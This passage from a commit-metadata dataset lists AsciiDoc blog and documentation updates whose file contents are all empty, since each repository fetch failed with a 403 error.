0.5.1","repos":"ciena-blueplanet\/developers.blog,pdudits\/pdudits.github.io,aspick\/hubpress.io,mrfgl\/blog,magivfer\/pages,mrtrombley\/blog,jlmcgehee21\/nooganeer,sxgc\/blog,OlympusOnline2\/announcements,nthline\/hubpress.io,elinep\/blog,brendena\/hubpress.io,joescharf\/joescharf.github.io,cmolitor\/blog,mkent-at-rivermeadow-dot-com\/hubpress.io,mkent-at-rivermeadow-dot-com\/hubpress.io,joescharf\/joescharf.github.io,mairandomness\/randomblog,JohanBrunet\/hubpress.io,pramodjg\/articles,ruaqiwei23\/blog,gogonkt\/makenothing,palaxi00\/palaxi00.github.io,ErJ101\/hbspractise,joshuarrrr\/hubpress.io,sebarid\/pages,sakkemo\/blog,akhmetgali\/hubpress.io,simonturesson\/hubpresstestsimon,chackomathew\/blog,willcrisis\/www.willcrisis.com,jsiu22\/blog,gsha0\/hubpress.io,mcornell\/OFM,laibaogo\/hubpress.io,crotel\/studio,pdudits\/pdudits.github.io,xinmeng1\/note,mrtrombley\/blog,jabbytechnologies\/blog,joescharf\/joescharf.github.io,kobusb\/blog,fghhfg\/hubpress.io,sebarid\/pages,seturne\/hubpress.io,brendena\/hubpress.io,mrfgl\/blog,Port666\/hubpress.io,ottoandry\/ottoandry1,seturne\/hubpress.io,ErJ101\/hbspractise,mcornell\/OFM,dmacstack\/glob,Port666\/hubpress.io,yaks-all-the-way-down\/hubpress.github.io,Jason2013\/hubpress,dsuryakusuma\/dsuryakusuma.github.io,josegomezr\/blog,SockPastaRock\/hubpress.io,atomfrede\/shiny-adventure,DaOesten\/hubpress.io,anshu92\/blog,magivfer\/pages,palaxi00\/palaxi00.github.io,andreassiegelrfid\/hubpress.io,sebprev\/blog,koter84\/blog,JohanBrunet\/hubpress.io,ottoandry\/ottoandry1,mrfgl\/blog,josegomezr\/blog,pdudits\/hubpress,nicolaschaillot\/pechdencouty,arabindamoni\/hubpress.io,manelvf\/blog,ashalkhakov\/hubpress.io,Jason2013\/hubpress,qingyuqy\/qingyuqy.io,AnassKartit\/anasskartit.github.io,moonPress\/press.io,hiun\/hubpress.io,apoch\/blog,gogonkt\/makenothing,Abdul2\/abdul2.github.io,Abdul2\/abdul2.github.io,lrabiet\/patisserie,jamarortiz\/pragmaticalware,anwfr\/blog.anw.fr,Bloggerschmidt\/bloggerschmidt.de,JohanBrunet\/hubpress.io,tom-konda\/blog,agentmilindu\/hubpress.io,yaks-all-the-way-down\/hubpress.github.io,sakkemo\/blog,entropyz\/blog,crotel\/meditation,cmhgroupllc\/blog,adjiebpratama\/press,chackomathew\/blog,PerthHackers\/blog,plyom\/hubpress.io,ErJ101\/hbspractise,princeminz\/blog,porolakka\/hubpress.io,btsibr\/myhubpress,atomfrede\/shiny-adventure,nthline\/hubpress.io,aql\/hubpress.io,crotel\/studio,ciena-blueplanet\/developers.blog,qingyuqy\/qingyuqy.io,Port666\/hubpress.io,sebprev\/blog,juhuntenburg\/gsoc2017,aspick\/hubpress.io,gbougeard\/blog.english,akhmetgali\/hubpress.io,btsibr\/myhubpress,heartnn\/hubpress.io,rorosaurus\/hubpress.io,OlympusOnline2\/announcements,Nepal-Blockchain\/danphe-blogs,crobby\/hubpress.io,binout\/javaonemorething,pepite\/hubpress.io,gbougeard\/blog.english,laibaogo\/hubpress.io,matthardwick\/hubpress.io,plyom\/hubpress.io,OdieD8\/hubpress.io,princeminz\/blog,hiun\/hubpress.io,DavidTPate\/davidtpate.com,entropyz\/blog,topicusonderwijs\/topicusonderwijs.github.io,ditirambo\/ditirambo.es,ashalkhakov\/hubpress.io,heartnn\/hubpress.io,magivfer\/pages,palaxi00\/palaxi00.github.io,xinmeng1\/note,pramodjg\/articles,ashalkhakov\/hubpress.io,wzzrd\/hubpress.io,sxgc\/blog,cmolitor\/blog,nicolaschaillot\/pechdencouty,jjmean2\/server-study,binout\/javaonemorething,heartnn\/hubpress.io,thaibeouu\/blog,mkent-at-rivermeadow-dot-com\/hubpress.io,rynop\/rynop.hubpress.io,porolakka\/hubpress.io,ambarishpande\/blog,anshu92\/blog,porolakka\/hubpress.io,hva314\/blog,ambarishpande\/blog,OdieD8\/hubpress.io,brendena\/hubpress.io,anandjagadeesh\/blog,OlympusOnline2\/announcements,ruaqiwei23\/blog,gsha0\/hubpress.io,ml4den\/hubpress,nthline\/hubpress.io,manelvf\/blog,sakkemo\/blog,ice09\/ice09ng,gogonkt\/makenothing,shunkou\/blog,cmhgroupllc\/blog,elinep\/blog,porolakka\/hubpress.io,rynop\/rynop.hubpress.io,dsuryakusuma\/dsuryakusuma.github.io,dsuryakusuma\/dsuryakusuma.github.io,loetjoe\/blog,magivfer\/pages,jsiu22\/blog,jerometambo\/blog,alexknowshtml\/thebigmove,qingyuqy\/qingyuqy.io,berryzed\/tech-blog,josegomezr\/blog,entropyz\/blog,Evolution2626\/blog,gbougeard\/blog.english,berryzed\/tech-blog,lrabiet\/patisserie,OlympusOnline2\/announcements,adjiebpratama\/press,berryzed\/tech-blog,IEEECompute\/blog,nicksam112\/nicksam112.github.io,aspick\/hubpress.io,simonturesson\/hubpresstestsimon,seturne\/hubpress.io,anshu92\/blog,sebprev\/blog,Nepal-Blockchain\/danphe-blogs,aql\/hubpress.io,btsibr\/myhubpress,loetjoe\/blog,mimiz\/mimiz.github.io,kornel661\/blog-test-jm,shunkou\/blog,jabbytechnologies\/blog,chackomathew\/blog,matthardwick\/hubpress.io,rynop\/rynop.hubpress.io,binout\/javaonemorething,shunkou\/blog,sebarid\/pages,shinnoki\/hubpress.io,ml4den\/hubpress,jcsirot\/hubpress.io,pramodjg\/articles,AnassKartit\/anasskartit.github.io,willcrisis\/www.willcrisis.com,DavidTPate\/davidtpate.com,msavy\/rhymewithgravy.com,manelvf\/blog,btsibr\/myhubpress,mrtrombley\/blog,lrabiet\/patisserie,anandjagadeesh\/blog,ciena-blueplanet\/developers.blog,ambarishpande\/blog,jlmcgehee21\/nooganeer,shinnoki\/hubpress.io,simonturesson\/hubpresstestsimon,kornel661\/blog-test-jm,thaibeouu\/blog,wzzrd\/hubpress.io,discimport\/blog.discimport.dk,yaks-all-the-way-down\/hubpress.github.io,lawrencetaylor\/hubpress.io,jbutz\/hubpress-test,Nepal-Blockchain\/danphe-blogs,jerometambo\/blog,lichengzhu\/blog,miroque\/shirokuma,princeminz\/blog,cmhgroupllc\/blog,anthonny\/personal-blog,willcrisis\/www.willcrisis.com,loetjoe\/blog,trycrmr\/hubpress.io,wzzrd\/hubpress.io,ml4den\/hubpress,mairandomness\/randomblog,lawrencetaylor\/hubpress.io,baocongchen\/blogs,setupminimal\/blog,PerthHackers\/blog,corporatesanyasi\/corporatesanyasi.github.io,wzzrd\/hubpress.io,Jason2013\/hubpress,ditirambo\/ditirambo.es,palaxi00\/palaxi00.github.io,aspick\/hubpress.io,AnassKartit\/anasskartit.github.io,setupminimal\/blog,pepite\/hubpress.io,kobusb\/blog,AnassKartit\/anasskartit.github.io,simonturesson\/hubpresstestsimon,SnorlaxH\/blog.urusa.me,nicolaschaillot\/pechdencouty,jcsirot\/hubpress.io,hva314\/blog,juhuntenburg\/gsoc2017,crotel\/meditation,rorohiko21\/blog,binout\/javaonemorething,plyom\/hubpress.io,DavidTPate\/davidtpate.com,Port666\/hubpress.io,mimiz\/mimiz.github.io,pepite\/hubpress.io,setupminimal\/blog,jcsirot\/hubpress.io,juhuntenburg\/gsoc2017,discimport\/blog.discimport.dk,Adyrhan\/adyrhan.github.io,rynop\/rynop.hubpress.io,willcrisis\/www.willcrisis.com,pramodjg\/articles,ErJ101\/hbspractise,fghhfg\/hubpress.io,Evolution2626\/blog,jbutz\/hubpress-test,Bloggerschmidt\/bloggerschmidt.de,DavidTPate\/davidtpate.com,mcornell\/OFM,nicolaschaillot\/pechdencouty,joshuarrrr\/hubpress.io,nicksam112\/nicksam112.github.io,SockPastaRock\/hubpress.io,ml4den\/hubpress,Jekin6\/blog,atomfrede\/shiny-adventure,jsiu22\/blog,nandansaha\/AroundTheWeb,DaOesten\/hubpress.io,rubyinhell\/hubpress.io,jcsirot\/hubpress.io,tom-konda\/blog,celsogg\/blog,sanctumware\/hubpress,heartnn\/hubpress.io,jlmcgehee21\/nooganeer,agentmilindu\/hubpress.io,msavy\/rhymewithgravy.com,hva314\/blog,igovsol\/blog,seturne\/hubpress.io,anthonny\/personal-blog,agentmilindu\/hubpress.io,elinep\/blog,baocongchen\/blogs,anwfr\/blog.anw.fr,nicksam112\/nicksam112.github.io,OdieD8\/hubpress.io,andreassiegelrfid\/hubpress.io,tom-konda\/blog,topicusonderwijs\/topicusonderwijs.github.io,cmolitor\/blog,laibaogo\/hubpress.io,jbutz\/hubpress-test,tmdgus0118\/blog.code404.co.kr,agentmilindu\/hubpress.io,hiun\/hubpress.io,arabindamoni\/hubpress.io,topicusonderwijs\/topicusonderwijs.github.io,nicksam112\/nicksam112.github.io,chackomathew\/blog,arabindamoni\/hubpress.io,Abdul2\/abdul2.github.io,palaxi00\/palaxi00.github.io,tmdgus0118\/blog.code404.co.kr,nandansaha\/AroundTheWeb,celsogg\/blog,Jekin6\/blog,jjmean2\/server-study,ncomet\/asciiblog,shunkou\/blog,sanctumware\/hubpress,manelvf\/blog,Adyrhan\/adyrhan.github.io,berryzed\/tech-blog,ditirambo\/ditirambo.es,ncomet\/asciiblog,lrabiet\/patisserie,sanctumware\/hubpress,matthardwick\/hubpress.io,DaOesten\/hubpress.io,nandansaha\/AroundTheWeb,andreassiegelrfid\/hubpress.io,Nepal-Blockchain\/danphe-blogs,mkent-at-rivermeadow-dot-com\/hubpress.io,tom-konda\/blog,andreassiegelrfid\/hubpress.io,brendena\/hubpress.io,fghhfg\/hubpress.io,juhuntenburg\/gsoc2017,crotel\/studio,SnorlaxH\/blog.urusa.me,anandjagadeesh\/blog,jsiu22\/blog,Adyrhan\/adyrhan.github.io,ashalkhakov\/hubpress.io,jjmean2\/server-study,artavels\/pages,jbutz\/hubpress-test,nthline\/hubpress.io,akhmetgali\/hubpress.io,ice09\/ice09ng,artavels\/pages,kornel661\/blog-test-jm,devananda\/devananda.github.io,PerthHackers\/blog,dsuryakusuma\/dsuryakusuma.github.io,moonPress\/press.io,koter84\/blog,trycrmr\/hubpress.io,akhmetgali\/hubpress.io,baocongchen\/blogs,igovsol\/blog,Jekin6\/blog,miroque\/shirokuma,jamarortiz\/pragmaticalware,ncomet\/asciiblog,Evolution2626\/blog,pdudits\/hubpress,alexknowshtml\/thebigmove,celsogg\/blog,ice09\/ice09ng,artavels\/pages,Abdul2\/abdul2.github.io,apoch\/blog,lawrencetaylor\/hubpress.io,Adyrhan\/adyrhan.github.io,hiun\/hubpress.io,corporatesanyasi\/corporatesanyasi.github.io,IEEECompute\/blog,anandjagadeesh\/blog,ncomet\/asciiblog,Jason2013\/hubpress,kobusb\/blog,fghhfg\/hubpress.io,xinmeng1\/note,DaOesten\/hubpress.io,anshu92\/blog,miroque\/shirokuma,corporatesanyasi\/corporatesanyasi.github.io,alexknowshtml\/thebigmove,mimiz\/mimiz.github.io,SnorlaxH\/blog.urusa.me,qingyuqy\/qingyuqy.io,josegomezr\/blog,sxgc\/blog,kobusb\/blog,anwfr\/blog.anw.fr,sebprev\/blog,ottoandry\/ottoandry1,jabbytechnologies\/blog,Evolution2626\/blog,atomfrede\/shiny-adventure,crobby\/hubpress.io,loetjoe\/blog,adjiebpratama\/press,pdudits\/pdudits.github.io,palaxi00\/palaxi00.github.io,nandansaha\/AroundTheWeb,aql\/hubpress.io,crobby\/hubpress.io,rorosaurus\/hubpress.io,pdudits\/pdudits.github.io,palaxi00\/palaxi00.github.io,mairandomness\/randomblog,PerthHackers\/blog,igovsol\/blog,sakkemo\/blog,ambarishpande\/blog,joshuarrrr\/hubpress.io,gogonkt\/makenothing,koter84\/blog,SnorlaxH\/blog.urusa.me,lawrencetaylor\/hubpress.io,jamarortiz\/pragmaticalware,josegomezr\/blog,ice09\/ice09ng,pepite\/hubpress.io,rorosaurus\/hubpress.io,jerometambo\/blog,laibaogo\/hubpress.io,jerometambo\/blog,moonPress\/press.io,pdudits\/hubpress,lichengzhu\/blog,dmacstack\/glob,dmacstack\/glob,ruaqiwei23\/blog,devananda\/devananda.github.io,trycrmr\/hubpress.io,ditirambo\/ditirambo.es,mrfgl\/blog,IEEECompute\/blog,jlmcgehee21\/nooganeer,setupminimal\/blog,mimiz\/mimiz.github.io,rorohiko21\/blog,discimport\/blog.discimport.dk,adjiebpratama\/press,ruaqiwei23\/blog,kornel661\/blog-test-jm,alexknowshtml\/thebigmove,anwfr\/blog.anw.fr,rorohiko21\/blog,celsogg\/blog,OdieD8\/hubpress.io,mairandomness\/randomblog,topicusonderwijs\/topicusonderwijs.github.io,lichengzhu\/blog,princeminz\/blog,mcornell\/OFM,Bloggerschmidt\/bloggerschmidt.de,ottoandry\/ottoandry1,joshuarrrr\/hubpress.io,devananda\/devananda.github.io,mrtrombley\/blog,aql\/hubpress.io,plyom\/hubpress.io,miroque\/shirokuma,baocongchen\/blogs,rubyinhell\/hubpress.io,JohanBrunet\/hubpress.io,jjmean2\/server-study,yaks-all-the-way-down\/hubpress.github.io,shinnoki\/hubpress.io,SockPastaRock\/hubpress.io,sanctumware\/hubpress,pdudits\/hubpress,apoch\/blog,rubyinhell\/hubpress.io,thaibeouu\/blog,artavels\/pages,rubyinhell\/hubpress.io,matthardwick\/hubpress.io,rorosaurus\/hubpress.io,crobby\/hubpress.io,ciena-blueplanet\/developers.blog,cmhgroupllc\/blog,moonPress\/press.io,SockPastaRock\/hubpress.io,xinmeng1\/note,devananda\/devananda.github.io,trycrmr\/hubpress.io,lichengzhu\/blog,Jekin6\/blog,shinnoki\/hubpress.io,hva314\/blog,gsha0\/hubpress.io,elinep\/blog,sxgc\/blog,crotel\/studio,IEEECompute\/blog,Bloggerschmidt\/bloggerschmidt.de,arabindamoni\/hubpress.io,anthonny\/personal-blog,cmolitor\/blog,gbougeard\/blog.english,igovsol\/blog,joescharf\/joescharf.github.io,msavy\/rhymewithgravy.com,apoch\/blog,sebarid\/pages,thaibeouu\/blog,jabbytechnologies\/blog,entropyz\/blog,msavy\/rhymewithgravy.com,anthonny\/personal-blog,crotel\/meditation,dmacstack\/glob,rorohiko21\/blog,discimport\/blog.discimport.dk,koter84\/blog,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,jamarortiz\/pragmaticalware,corporatesanyasi\/corporatesanyasi.github.io,crotel\/meditation,gsha0\/hubpress.io,YvonneZhang\/yvonnezhang.github.io","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SockPastaRock\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcf6e003614a31ee00e0d50545bd1edf05a9a0b7","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02b820a67c444f80b54bd26dcc5e5d434a9b2fe5","subject":"updated readme","message":"updated readme\n","repos":"iCasa\/WPN-XM,iamelectron\/WPN-XM,iCasa\/WPN-XM,Akhiljs\/WPN-XM,iCasa\/WPN-XM,WPN-XM\/WPN-XM,WPN-XM\/WPN-XM,iamelectron\/WPN-XM,iamelectron\/WPN-XM,iCasa\/WPN-XM,gencer\/WPN-XM,Akhiljs\/WPN-XM,iCasa\/WPN-XM,WPN-XM\/WPN-XM,WPN-XM\/WPN-XM,gencer\/WPN-XM,Akhiljs\/WPN-XM,gencer\/WPN-XM,iamelectron\/WPN-XM,Akhiljs\/WPN-XM,iamelectron\/WPN-XM,gencer\/WPN-XM,WPN-XM\/WPN-XM,iamelectron\/WPN-XM,iCasa\/WPN-XM,WPN-XM\/WPN-XM,Akhiljs\/WPN-XM,gencer\/WPN-XM,Akhiljs\/WPN-XM,gencer\/WPN-XM","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iCasa\/WPN-XM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa93e57db7c2fe4d56f103a032948fe23ece5b98","subject":"Update 2016-07-19-A-Dummy-Post.adoc","message":"Update 2016-07-19-A-Dummy-Post.adoc","repos":"railsdev\/railsdev.github.io,railsdev\/railsdev.github.io,railsdev\/railsdev.github.io,railsdev\/railsdev.github.io","old_file":"_posts\/2016-07-19-A-Dummy-Post.adoc","new_file":"_posts\/2016-07-19-A-Dummy-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/railsdev\/railsdev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09490117b0bbf7498e4aa0c4804487553ba628f8","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2be490705291d4a52217ba9497066bb1dedf8530","subject":"Update 2017-12-08-Go-O-R.adoc","message":"Update 2017-12-08-Go-O-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-Go-O-R.adoc","new_file":"_posts\/2017-12-08-Go-O-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3caecde73cf6921c846135750e452bc335dba2b7","subject":"Update 2015-05-16-Faustino-loeza-Perez4.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez4.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez4.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c7ee406bdf4aaee58381cb9709bf5f7c2defffa","subject":"Update 2015-12-13-Portmap-amplification.adoc","message":"Update 2015-12-13-Portmap-amplification.adoc","repos":"suedadam\/suedadam.github.io,suedadam\/suedadam.github.io,suedadam\/suedadam.github.io","old_file":"_posts\/2015-12-13-Portmap-amplification.adoc","new_file":"_posts\/2015-12-13-Portmap-amplification.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/suedadam\/suedadam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"784df4f09f1bd8ae24555b27072ef738029c082e","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"215de5eb663c994e713b8ed7d71dd5e9f9e7cfd6","subject":"CLOUD-269 add ENVs to doc","message":"CLOUD-269 add ENVs to doc\n","repos":"bdecoste\/application-templates,knrc\/application-templates,josefkarasek\/application-templates,jboss-openshift\/application-templates,errantepiphany\/application-templates,kyguy\/application-templates,douglaspalmer\/application-templates,rnetuka\/application-templates,rcernich\/application-templates,bparees\/application-templates","old_file":"docs\/datagrid\/datagrid65-basic.adoc","new_file":"docs\/datagrid\/datagrid65-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jboss-openshift\/application-templates.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"affeba425e581dc88e9ca99c368f56ddcf3cfeff","subject":"Update 2015-02-16-Razrabotka-i-tvorchestvo.adoc","message":"Update 2015-02-16-Razrabotka-i-tvorchestvo.adoc","repos":"alchapone\/alchapone.github.io,alchapone\/alchapone.github.io,alchapone\/alchapone.github.io","old_file":"_posts\/2015-02-16-Razrabotka-i-tvorchestvo.adoc","new_file":"_posts\/2015-02-16-Razrabotka-i-tvorchestvo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alchapone\/alchapone.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40456a47e0d0c4227215e2a98afc6443639ba7a6","subject":"Update 2018-09-15-Hack-The-Box-Stratosphere.adoc","message":"Update 2018-09-15-Hack-The-Box-Stratosphere.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2018-09-15-Hack-The-Box-Stratosphere.adoc","new_file":"_posts\/2018-09-15-Hack-The-Box-Stratosphere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a377539c6651c9b1b6c27b341b9a9d92a6402f6d","subject":"Update 2015-02-13-Mockito-le-mock-facile.adoc","message":"Update 2015-02-13-Mockito-le-mock-facile.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2015-02-13-Mockito-le-mock-facile.adoc","new_file":"_posts\/2015-02-13-Mockito-le-mock-facile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ceff005bf795c9194ee0472518b42d33d0c2c1d0","subject":"Update 2016-03-29-Zonas-de-transferencia.adoc","message":"Update 2016-03-29-Zonas-de-transferencia.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5792c3bbb091840d53f68b7b122f12f54c39ade8","subject":"Update 2017-08-19-Sony-WH-1000X-M-review.adoc","message":"Update 2017-08-19-Sony-WH-1000X-M-review.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-19-Sony-WH-1000X-M-review.adoc","new_file":"_posts\/2017-08-19-Sony-WH-1000X-M-review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ed05dc5afa6db5b9a10edeccef4d519d23e9f81","subject":"and again. I'm too stupid to merge the PR, I give up.","message":"and again. I'm too stupid to merge the PR, I give up.\n","repos":"aim42\/htmlSanityCheck,aim42\/htmlSanityCheck,aim42\/htmlSanityCheck","old_file":"src\/docs\/DevelopmentDocs.adoc","new_file":"src\/docs\/DevelopmentDocs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aim42\/htmlSanityCheck.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0d4c733dd090ffc7db6d8223927e6b6af36ee8a6","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05441a5d1e1ff2b5ef3da676c7e774e1c2f50cd9","subject":"fix: \u30ec\u30d3\u30e5\u30fc\u6307\u6458\u306e\u4fee\u6b63","message":"fix: \u30ec\u30d3\u30e5\u30fc\u6307\u6458\u306e\u4fee\u6b63\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c3eba96dd27a8e40890212bb4b49bf4f9e7be72","subject":"Docs: Add missing migration doc for logging change","message":"Docs: Add missing migration doc for logging change\n","repos":"strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/migration\/migrate_6_5.asciidoc","new_file":"docs\/reference\/migration\/migrate_6_5.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/strapdata\/elassandra.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1b5dcdc1891b5b38c7ea0b5b236642b3ab170c8e","subject":"Update 2015-03-13-Schatten-in-XFCE-412.adoc","message":"Update 2015-03-13-Schatten-in-XFCE-412.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2015-03-13-Schatten-in-XFCE-412.adoc","new_file":"_posts\/2015-03-13-Schatten-in-XFCE-412.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"079cfcc553b6f3597e77c68da56ef83d6d631433","subject":"Update 2015-12-29-PAGE-NOT-FOUND-srsly.adoc","message":"Update 2015-12-29-PAGE-NOT-FOUND-srsly.adoc","repos":"Dekken\/dekken.github.io,Dekken\/dekken.github.io,Dekken\/dekken.github.io","old_file":"_posts\/2015-12-29-PAGE-NOT-FOUND-srsly.adoc","new_file":"_posts\/2015-12-29-PAGE-NOT-FOUND-srsly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Dekken\/dekken.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe911f440d0441aa16f664c98c90e51048749cfe","subject":"y2b create post Headphones That Boom?","message":"y2b create post Headphones That Boom?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-12-Headphones-That-Boom.adoc","new_file":"_posts\/2016-04-12-Headphones-That-Boom.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"914ea62c1181616cab88ac20625a155df2457a08","subject":"Update 2015-07-11-Japanfest-in-M.adoc","message":"Update 2015-07-11-Japanfest-in-M.adoc","repos":"fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io","old_file":"_posts\/2015-07-11-Japanfest-in-M.adoc","new_file":"_posts\/2015-07-11-Japanfest-in-M.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fundstuecke\/fundstuecke.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"522f242c168a2f0e9cadab264965c7bd4ca9d6da","subject":"Update 